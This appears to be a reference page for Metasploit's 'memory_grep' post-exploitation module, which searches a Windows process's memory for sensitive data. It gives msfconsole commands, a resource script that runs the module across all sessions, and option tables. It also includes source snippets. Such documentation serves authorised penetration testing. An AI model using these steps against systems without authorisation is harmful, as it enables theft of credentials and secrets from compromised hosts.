Windows Gather Process Memory Grep - Metasploit


This page contains detailed information about how to use the post/windows/gather/memory_grep metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather Process Memory Grep
Module: post/windows/gather/memory_grep
Source code: modules/post/windows/gather/memory_grep.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module allows for searching the memory space of a process for potentially sensitive data. Please note: When the HEAP option is enabled, the module will have to migrate to the process you are grepping, and will not migrate back automatically. This means that if the user terminates the application after using this module, you may lose your session.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/memory_grep

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/memory_grep
msf post(memory_grep) > show options
    ... show and set options ...
msf post(memory_grep) > set SESSION session-id
msf post(memory_grep) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/memory_grep")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

  • PROCESS: Name of the process to dump memory from

  • REGEX: Regular expression to search for with in memory

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/memory_grep post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/memory_grep

msf6 post(windows/gather/memory_grep) > show info

       Name: Windows Gather Process Memory Grep
     Module: post/windows/gather/memory_grep
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  bannedit <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  HEAP     false            no        Grep from heap
  PROCESS                   yes       Name of the process to dump memory from
  REGEX                     yes       Regular expression to search for with in memory
  SESSION                   yes       The session to run this module on.

Description:
  This module allows for searching the memory space of a process for 
  potentially sensitive data. Please note: When the HEAP option is 
  enabled, the module will have to migrate to the process you are 
  grepping, and will not migrate back automatically. This means that 
  if the user terminates the application after using this module, you 
  may lose your session.

Module Options


This is a complete list of options available in the windows/gather/memory_grep post exploitation module:

msf6 post(windows/gather/memory_grep) > show options

Module options (post/windows/gather/memory_grep):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HEAP     false            no        Grep from heap
   PROCESS                   yes       Name of the process to dump memory from
   REGEX                     yes       Regular expression to search for with in memory
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/memory_grep post exploitation module:

msf6 post(windows/gather/memory_grep) > show advanced

Module advanced options (post/windows/gather/memory_grep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/memory_grep module can do:

msf6 post(windows/gather/memory_grep) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/memory_grep post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/memory_grep) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

GetLastError


Here is a relevant code snippet related to the "GetLastError" error message:

91:	          'Size' => data.length,
92:	          'Handle' => handle,
93:	          'Data' => data
94:	        } if data.length > 0
95:	        lpentry = ret['lpEntry']
96:	        break if ret['GetLastError'] == 259 or size == 0
97:	      end
98:	    end
99:	
100:	    heap
101:	  end

Only meterpreter sessions are supported by this post module


Here is a relevant code snippet related to the "Only meterpreter sessions are supported by this post module" error message:

132:	    end
133:	  end
134:	
135:	  def run
136:	    if session.type != "meterpreter"
137:	      print_error "Only meterpreter sessions are supported by this post module"
138:	      return
139:	    end
140:	
141:	    print_status("Running module against #{sysinfo['Computer']}")
142:	

No PID found for <PROC_NAME>


Here is a relevant code snippet related to the "No PID found for <PROC_NAME>" error message:

147:	    client.sys.process.processes.each do |p|
148:	      pids << p['pid'] if p['name'] == proc_name
149:	    end
150:	
151:	    if pids.empty?
152:	      print_error("No PID found for #{proc_name}")
153:	      return
154:	    end
155:	
156:	    print_status("PIDs found for #{proc_name}: #{pids * ', '}")
157:	

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • bannedit

Version


This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.